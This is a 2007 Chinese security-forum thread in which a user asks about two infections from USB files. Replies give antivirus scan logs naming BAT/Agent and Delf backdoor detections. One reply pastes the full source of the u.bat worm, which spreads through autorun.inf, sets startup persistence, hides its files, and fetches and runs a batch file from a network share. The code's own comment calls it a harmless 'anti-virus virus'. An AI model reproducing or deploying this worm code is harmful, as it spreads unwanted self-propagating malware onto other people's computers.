中了这两个病毒怎么办啊！！[MD5: 1F3293][MD5: 2F7AD6]

zlq7zj

今天卖mp3  下载歌曲的时候！！！（当时在电骡 就把avast关掉了）插电脑的时候双击了，当时没想到里面有病毒。点开的时候看到里面有病毒  。请问高手 中了着两个病毒该怎么办啊 ！！杀毒软件杀不杀的掉啊？ 可以清除干净吗？

The EQs

Scan performed at: 2007-6-19 23:25:46
Scanning Log
NOD32 version 2338 (20070619) NT
Command line: C:\Documents and Settings\EQ2\桌面\u.rar C:\Documents and Settings\EQ2\桌面\autorun.rar
Operating memory - is OK

Date: 19.6.2007  Time: 23:25:55
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\u.rar; C:\Documents and Settings\EQ2\桌面\autorun.rar
C:\Documents and Settings\EQ2\桌面\u.rar ?RAR ?u.bat - BAT/Agent.B virus - was a part of the deleted object
C:\Documents and Settings\EQ2\桌面\autorun.rar ?RAR ?autorun.pif - Win32/Delf.NCV worm - was a part of the deleted object
Number of scanned files: 8
Number of threats found: 2
Number of files cleaned: 2
Time of completion: 23:25:56 Total scanning time: 1 sec (00:00:01)

kp2006

楼主名字是不是太流氓了

rav

Worm.Antiu.a

Backdoor.RWX.2005.gw

[ 本帖最后由 kp2006 于 2007-6-19 23:25 编辑 ]

dyw1021

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\新建文件夹'
C:\Documents and Settings\Administrator\桌面\新建文件夹\autorun.rar
  [0] Archive type: RAR
  --> autorun.pif
      [DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Delf.aws.2 Backdoor server programs
      [INFO]      The file was moved to '46ebf74c.qua'!
C:\Documents and Settings\Administrator\桌面\新建文件夹\u.rar
  [0] Archive type: RAR
  --> u.bat
      [DETECTION] Contains signature of the batch virus BAT/VB.A
      [INFO]      The file was moved to '46e9f706.qua'!

蓝色牛仔裤

电脑中毒后出现什么状况了？感觉这特眼熟。

[Scan path] C:\Documents and Settings\Administrator\桌面\u.rar
>C:\Documents and Settings\Administrator\桌面\u.rar\u.bat infected with BAT.Autoruner
>C:\Documents and Settings\Administrator\桌面\u.rar\u.vbe - Ok
>C:\Documents and Settings\Administrator\桌面\u.rar\2007-06-12.sk - Ok
>C:\Documents and Settings\Administrator\桌面\u.rar\AUTORUN.INF - Ok
C:\Documents and Settings\Administrator\桌面\u.rar - archive contains infected objects

[Scan path] C:\Documents and Settings\Administrator\桌面\autorun.rar
>C:\Documents and Settings\Administrator\桌面\autorun.rar\autorun.inf - Ok
>>>C:\Documents and Settings\Administrator\桌面\autorun.rar\autorun.pif infected with BackDoor.Ekai
C:\Documents and Settings\Administrator\桌面\autorun.rar - archive contains infected objects

-----------------------------------------------------------------------------
Scan statistics
-----------------------------------------------------------------------------
Objects scanned: 8
Infected objects found: 2
Objects with modifications found: 0
Suspicious objects found: 0
Adware programs found: 0
Dialer programs found: 0
Joke programs found: 0
Riskware programs found: 0
Hacktool programs found: 0
Objects cured: 0
Objects deleted: 0
Objects renamed: 0
Objects moved: 0
Objects ignored: 0
Scan speed: 276 Kb/s
Scan time: 00:00:01

蓝色牛仔裤

果然是这个！！

1. @echo off
   
2. setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
   
3. cd /d "%~dp0"
   
4. if /i "%cd%"=="%~d0" (explorer.exe "%~d0")
   
5. set v=01
   
6. set "endf=%systemdrive%\8bye.txt"
   
7. call:ie s.vbe
   
8. echo.Wscript.sleep 10000>s.vbe
   
9. attrib s.vbe +a +s +r +h
   
10. if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
    
11. set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
    
12. set n=0
    
13. call:inf >inf.tem
    
14. call:ql
    
15. uda.a
    
16. md "%systemroot%\bakfiles"
    
17. call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
    
18. copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
    
19. call:ie "%systemroot%\bakfiles\uda.a"
    
20. call:copy uda.a "%systemroot%\bakfiles"
    
21. :s
    
22. echo. >uhere-%v%.txt
    
23. if exist "%endf%" (set n=1&goto end)
    
24. if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call \\192.168.2.211\re$\add.bat))
    
25. set d=!dl:~%n%,1!:
    
26. set /a n=n+1
    
27. if not exist %d% (goto s)
    
28. if exist "%d%\autorun.inf" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
    
29. rd "%d%\autorun.inf" /s /q)
    
30. if
    
31. exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not
    
32. "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i
    
33. -s&goto s1)) else (goto s1)
    
34. if not exist "%d%\%~n0.vbe" (goto s2)
    
35. if not exist "%d%\%~nx0" (goto s3)
    
36. if not exist "%d%\uda.a" (goto s4)
    
37. if exist %d%\%date:~0,10%.sk (goto s)
    
38. :s1
    
39. call:inf >%d%\autorun.inf
    
40. attrib %d%\autorun.inf +a +s +r +h
    
41. call:ie "%d%\%~n0.vbe"
    
42. :s2
    
43. call:vbe "%~nx0" >"%d%\%~n0.vbe"
    
44. attrib "%d%\%~n0.vbe" +a +s +r +h
    
45. :s3
    
46. call:copy "%~dpnx0" "%d%"
    
47. :s4
    
48. call:copy "uda.a" "%d%"
    
49. call:ie %d%\*.sk
    
50. echo.>%d%\%date:~0,10%.sk
    
51. attrib %d%\%date:~0,10%.sk +a +s +r +h
    
52. goto s
    
53. :cb
    
54. if exist "%systemroot%\uhere-*.txt" (del /a /f /q "%systemroot%\uhere-*.txt"&s.vbe)
    
55. if
    
56. exist "%systemroot%\uhere-*.txt" (if exist "%systemroot%\uhere-%v%.txt"
    
57. (goto :eof) else (call:v "%systemroot%\uhere-*.txt"&(if %v% lss
    
58. !v0! (goto :eof))))
    
59. call:rm >%systemdrive%\已经被反U盘病毒的“病毒”感染.txt
    
60. call:copy "%~dpnx0" "%systemroot%"
    
61. call:copy "uda.a" "%systemroot%"
    
62. call:ie "%systemroot%\%~n0.vbe"
    
63. call:vbe "%~nx0" >"%systemroot%\%~n0.vbe"
    
64. call:ie "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
    
65. call:vbe "%systemroot%\%~nx0" >"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
    
66. start "" /wait /d "%systemroot%" "%systemroot%\%~n0.vbe"
    
67. goto :eof
    
68. :v
    
69. set "v0=%~nx1"
    
70. set /a "v0=%v0:~6,2%"
    
71. goto :eof
    
72. :rm
    
73. echo.
    
74.      
    
75. 看到这个，请不要慌张。电脑病毒的定义为：1、传播性；2、潜伏性；3、破坏性。根据此定义，本脚本这完全符合1，有点符合2，不符合3（若说破坏性也不
    
76. 是没有，但只针对U盘病毒，而且会在删除文件前备份，备份地址：%systemroot%\bakfiles\），因此，病毒二字加了引号，即不是真正的
    
77. 病毒。本脚本的目的是通过U盘传播，并沿途清理U盘中的病毒，如果可能，会把收集到的病毒文件发给作者；不会给您造成太多不便（与其被U盘病毒感染，不如
    
78. 被本脚本感染啦）。如果您觉得这样给您造成了不便，想卸载本脚本，请在%systemdrive%\下新建一个名为8bye的文本文件（不需要写入内容，
    
79. 即：新建%endf%），大约在20秒内完成卸载，并帮助您进行U盘病毒免疫。欲了解更多，请打开 U盘病毒分析
    
80. 的自述文件（地址：%systemroot%\readme.txt）。谢谢！
    
81. echo.        包含文件：u.bat（本文件，4240字节）、uda.a（21674字节，md5：e6762ebf6123bc17ab31995c61bba955）
    
82. echo.        为研究性学习而制作，于2007-03-15，望多多支持！作者：CyyIsGood（肇中高一11），联系：cyyisgood@126.com
    
83. goto :eof
    
84. :vbe
    
85. echo.wscript.createobject("wscript.shell").run """%~1"" /start",0
    
86. goto :eof
    
87. :inf
    
88. echo.[AutoRun]
    
89. echo.open=wscript.exe %~n0.vbe
    
90. echo.shell\open\Command=wscript.exe %~n0.vbe
    
91. echo.shell\explore\Command=wscript.exe %~n0.vbe
    
92. echo.shell\find\Command=wscript.exe %~n0.vbe
    
93. goto :eof
    
94. :ie
    
95. if exist "%~1" (del /a /f /q "%~1")
    
96. goto :eof
    
97. :copy
    
98. call:ie "%~dp2%~nx1"
    
99. attrib "%~1" -s -h
    
100. copy "%~1" "%~dp2"
     
101. attrib "%~1" +s +h
     
102. attrib "%~dp2%~nx1" +s +h
     
103. goto :eof
     
104. :ql
     
105. cd /d "%systemroot%"
     
106. del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat U盘病毒分析.bat zap.a 主操控.bat 打开发送功能.bat
     
107. cd /d "%~dp0"
     
108. goto :eof
     
109. :end
     
110. set d=!dl:~%n%,1!
     
111. echo.%d%:\
     
112. if exist %d%:\ (del /a /f /q %d%:\u.vbe %d%:\u.bat %d%:\uda.a)
     
113. set /a n=n+1
     
114. if not "!dl:~%n%,1!"=="" goto end
     
115. call
     
116. U盘病毒分析.bat -c&call:ql&del /a /f /q
     
117. "%systemdrive%\已经被反U盘病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem
     
118. "uda.a" "%~n0.vbe" "uhere-%v%.txt"
     
119. "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" "%~nx0"

复制代码

[ 本帖最后由 蓝色牛仔裤 于 2007-6-19 23:33 编辑 ]

蓝色牛仔裤

我同学上次中招后打不开硬盘，结果要格盘～[:27:]

jlennon

ps1.40快出正式版了，1.30用了感觉怎么样？

蓝色牛仔裤

1.3感觉很好，用过的HIPS感觉就他最适合自己，1.40肯定试试看～
睡觉喽。。失陪啦～

wangjay1980

deleted: virus Virus.BAT.Agent.b        File: C:\Documents and Settings\Owner\×ÀÃæ\u.rar/u.bat
deleted: Trojan program Backdoor.Win32.Delf.aws        File: C:\Documents and Settings\Owner\×ÀÃæ\autorun.rar/autorun.pif//NSPack//NSPack